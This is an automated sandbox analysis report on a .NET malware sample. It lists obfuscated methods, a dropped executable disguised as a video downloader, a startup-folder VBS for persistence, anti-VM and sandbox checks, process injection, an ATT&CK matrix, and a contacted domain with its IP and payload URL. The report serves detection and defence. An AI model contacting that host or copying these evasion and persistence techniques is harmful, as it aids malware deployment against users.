Source: 4.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.41b5460.3.raw.unpack, kUBw49fxH8VSHvF6bmP.cs	High entropy of concatenated method names: 'iNGEodVlSYkBvs3P41Q', 'o6eJgiV4BbTFRq9Z0Tc', 'QeC5YgoA70', 'vh0ry9Sq2v', 'Urf59UD6q6', 't5g5LuBhWx', 'gBS5qQWftU', 'EVZ5TjZdwa', 'x9WnlOLUmw', 'GANffxiJGP'
Source: 4.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.41b5460.3.raw.unpack, cRwAELsbJHpIR56Pw0T.cs	High entropy of concatenated method names: 'zlIsEQCHbJ', 'yr8slaJKJ7', 'dcSs45bJe4', 'Sp2sjZiYvh', 'QTFsUOPTxB', 'kZQshcJIIU', 'oFsswLsa4t', 'O5Hs76xfcQ', 'qFxsHXTBcg', 'MC3sOk3VPZ'
Source: 4.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.41b5460.3.raw.unpack, s9nyGesyLX3kHgDN1X3.cs	High entropy of concatenated method names: 'r0G4lQ9uD6', 'qsg447eF6x', 'vML4j1m6jb', 'gKt4UkNMc3', 'cdW4hecy1X', 'mde4wdX7LC', 'VHe47NsOif', 'n5PsTU7iZE', 'wLh4HEBfZD', 'rAD4O5s9oo'
Source: 4.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4115440.4.raw.unpack, kUBw49fxH8VSHvF6bmP.cs	High entropy of concatenated method names: 'iNGEodVlSYkBvs3P41Q', 'o6eJgiV4BbTFRq9Z0Tc', 'QeC5YgoA70', 'vh0ry9Sq2v', 'Urf59UD6q6', 't5g5LuBhWx', 'gBS5qQWftU', 'EVZ5TjZdwa', 'x9WnlOLUmw', 'GANffxiJGP'
Source: 4.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4115440.4.raw.unpack, cRwAELsbJHpIR56Pw0T.cs	High entropy of concatenated method names: 'zlIsEQCHbJ', 'yr8slaJKJ7', 'dcSs45bJe4', 'Sp2sjZiYvh', 'QTFsUOPTxB', 'kZQshcJIIU', 'oFsswLsa4t', 'O5Hs76xfcQ', 'qFxsHXTBcg', 'MC3sOk3VPZ'
Source: 4.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4115440.4.raw.unpack, s9nyGesyLX3kHgDN1X3.cs	High entropy of concatenated method names: 'r0G4lQ9uD6', 'qsg447eF6x', 'vML4j1m6jb', 'gKt4UkNMc3', 'cdW4hecy1X', 'mde4wdX7LC', 'VHe47NsOif', 'n5PsTU7iZE', 'wLh4HEBfZD', 'rAD4O5s9oo'

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

File created: C:\Users\user\AppData\Local\4kvideodownloaderplus.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4kvideodownloaderplus.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4kvideodownloaderplus.vbs

Jump to behavior

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4kvideodownloaderplus.vbs

Jump to behavior

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe PID: 7648, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1959753041.0000000003247000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Memory allocated: 15D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Memory allocated: 31C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Memory allocated: 1750000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Memory allocated: 2CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Memory allocated: 2ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Memory allocated: 2D20000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Code function: 0_2_06312EB5 rdtsc

0_2_06312EB5

Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1959753041.0000000003247000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1959753041.0000000003247000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2913496765.00000000055C0000.00000004.08000000.00040000.00000000.sdmp, LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2911708889.0000000004045000.00000004.00000800.00020000.00000000.sdmp, LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2911708889.00000000041B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bgq3dA2un86T9tD%qedqeMUhKejqnlzjIp+gd2q9xfhPSKOWWs1Rl3hp
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1958891092.00000000013B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Code function: 0_2_06312EB5 rdtsc

0_2_06312EB5

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Memory written: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Process created: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe "C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe"

Jump to behavior

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Queries volume information: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Queries volume information: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Scheduled Task/Job	1 Scripting	111 Process Injection	1 Masquerading	OS Credential Dumping	221 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	111 Process Injection	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	24%	ReversingLabs
LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\4kvideodownloaderplus.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\4kvideodownloaderplus.exe	24%	ReversingLabs

Source	Detection	Scanner	Label
http://xianggrhen.com/composure/Vuglyxyuvio.pdfKaUX7OltiTRaxCtDq7h.igiywGRJl7xqn4AVJn	0%	Avira URL Cloud	safe
http://xianggrhen.com/composure/Vuglyxyuvio.pdf	0%	Avira URL Cloud	safe
http://xianggrhen.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
xianggrhen.com	45.9.191.182	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://xianggrhen.com/composure/Vuglyxyuvio.pdf	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	false		high
https://sectigo.com/CPS0	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	false		high
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	false		high
https://github.com/mgravell/protobuf-neti	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983887792.0000000006520000.00000004.08000000.00040000.00000000.sdmp	false		high
